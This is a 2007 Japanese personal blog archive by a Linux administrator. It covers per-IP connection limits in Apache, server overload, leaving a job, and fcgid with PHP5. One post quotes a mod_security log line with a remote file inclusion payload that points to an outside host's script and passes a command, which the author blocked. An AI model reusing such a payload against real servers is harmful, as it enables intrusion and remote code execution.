March 31, 2007

同じIPからの同時接続数が非常に多かったので。

昼に死んだ後、経過観察していたら、同じIPアドレスからの同時アクセスが異常に多いことがあったので、同一IPアドレスからの同時接続数を制限することにした。”Apacheセキュリティ”を見たら、 limitipconn というモジュールがあるらしい。ということで、Debianパッケージがあるか確認してみたら、1.3用しかない。同じ悩みの人がいないかなぁ、と思ったら、 kmutoさんが同じことされていた 。pbuilderの環境は作ってないが、iBookでOBS専用の開発環境があるので、kmutoさんの手順に倣って実施。ちゃんと制限できた。

[Sat Mar 31 15:26:44 2007] [error] [client xxx.xxx.xxx.xxx.] Rejecting client at xxx.xxx.xxx.xxx

これで少しはマシになるかなぁ…?

Apacheセキュリティ

投稿者 mkouhei
カテゴリー: Debian, security
Leave a comment
March 31, 2007

またか…。

今週もMaxClientsで落ちた。うーん、変なアクセスをしてくるところが多いのと、サーチエンジンのロボット検索がやたら増えてきたなぁ。で、明らかにおかしいリクエストを出して、modsecurityで落ちている。

[Sat Mar 31 10:23:22 2007] [error] [client 201.79.41.96] mod_security: Access de
nied with code 500. Pattern match "^$" at HEADER [hostname "hogehoge"] [ur
i "http://hogehoge/index.php?XA4F2B5AFC6B0A4C7A4ADA4CAA4A413kfl72.14.209.1
04/cache:ELL9KACjZWUJ:hogehoge/index.php3FX25A425F225B525AF25C625B025A425C
725A425AD25A425CA25A425A4=http://prm.hardbr.com/tool25.txt?&cmd=id"]

このアクセス元を逆引きすると、20178001001.user.veloxzone.com.br.のような感じで引ける。アドレス範囲は201.78.0.0/15で、ブラジルからなので、来てもらわんでも特に問題なし。すべて許否することにした。

それにしても、なんとかしないとなぁ、この状況。1月から、2、3月とアクセスが2倍、3倍と増えてきてるもんなぁ。そろそろやばいか。

投稿者 mkouhei
カテゴリー: security, Unix/Linux
Leave a comment
March 30, 2007

最終日。

というわけで、今日で最後だったのだが、チームの変な伝統となっている、最終日に最後の変更作業をやることに。変な伝統からの例外とはなれなかった。急遽やることになり、しかも変更点が非常に多く、変更申請の準備に非常に時間が掛かり、作業が完了したのは22時。17時半に業務終了の挨拶をしたのだけど。で作業終了後、業務終了の挨拶メールを出して、チームの人で吉祥寺に焼肉に。かなり美味かった。会社のPCを持って帰らねばならなかったので、酒を飲めなかったのは残念だったが止むなし。1時半前に店を出てタクシー乗り場に行くとものすごい行列。で、三鷹行きの終電に乗って三鷹へ向かったところ、吉祥寺では無いもののこちらもかなりの行列。ということで、マッサージへ誘っていただいた。最初は痛かったのだが、途中で寝落ちしていた。気持ちよかった。肩凝り酷いねと按摩のオバちゃんが言っていた。確かに肩凝りは酷いよなぁ。マッサージ終わって、三鷹駅でタクシーに乗って、帰宅。最後に良い思い出になった。ありがとうございました。

投稿者 mkouhei
カテゴリー: life
Leave a comment
March 30, 2007

生まれて初めての胴上げ。

今日で今の現場は終わりなので、昨日突然チームの方々に送別会をして頂いた 1 。最後に恒例の大量のネタ餞別を頂いた。狸のシッポの付いたペア円座蒲団 2 、加藤ローサのフォトエッセイ集 3 、Windowsゲーム本とMSに勤めていた人の本 4 、昨日で賞味期限切れのタルト 5 ので、食べたけど。))、それと花束 6

店出てから最後に突然胴上げをされた。どうもこれも恒例だったようだが、知らなかったのでびっくりした。で、生まれて初めて宙に舞ったが、落とされるんじゃないかとかなり怖かった…。胴上げをする側だったことはあったけど、まさか自分がされる側になるとは。貴重な体験をした。

今日は、やり残していたsendmailの勉強会をやって、ファイアウォールのコンポーネントレビューを行って、送別の挨拶をしてから、最後の最後に今の現場での最後の変更作業をやって終了、って、今のチームの変な伝統を引き継いでしまった…。orz 最後の日に変更作業って、なんか挨拶のネタ作りなのだろうか…。

1

って知らなかったのは自分だけで、スケジュール組まれていたようだ。

2

元・大痔主なのと、今年になってから合コンなんぞ行き始めたかららしい。

3

業務で使ってるPCで、毎日色んな女優や女性タレントの壁紙をランダムで表示させているからのようだ。あー、確かに加藤ローサも入れてたなぁ。自宅でもランダムでやってるけど。

4

Windowsが嫌いで、自宅もLinuxしかないからということで。

5

帰ってから腹減った((いつもの如く、あまり食べずに飲んでばかりだったので

6

これだけネタでは無かったようだ。

投稿者 mkouhei
カテゴリー: work
Leave a comment
March 29, 2007

fcgid & PHP5

Debian Etchでやる場合の メモ 。記載しておいたがセキュリティ的なことは考慮せず、とりあえず動かす、ということで、suExecすらさせてないので要注意。

もともとこれをやろうと思ったのは、fcgid & PHP5が、目的では無くて、2006年秋のOSCで、仮想化友の会で配布した、「意味なく仮想っちゃいました Ruby on Rails on Debian GNU/Linux Etch 1 」のイメージを作るときに、RoRのベース部分をfcgid & Rubyでやったのがきっかけ。fcgidでやるのと、モジュールで動かすのってどちらが良いのだろうか。SELinuxのMLかBOFかは忘れたけど、モジュールだと、実行ユーザを変更できないのでfcgid 2 の方が良い、とか言っていたような気がする。

週末あたりに、Debianで使える方式をまとめて、比較資料作るか。

1

なんかちょっと名前が違うかも知れないけど、気にするな!w

2

というか、その時はFastCGIだったはず

投稿者 mkouhei
カテゴリー: Debian, security
Leave a comment
— ブログアーカイブ —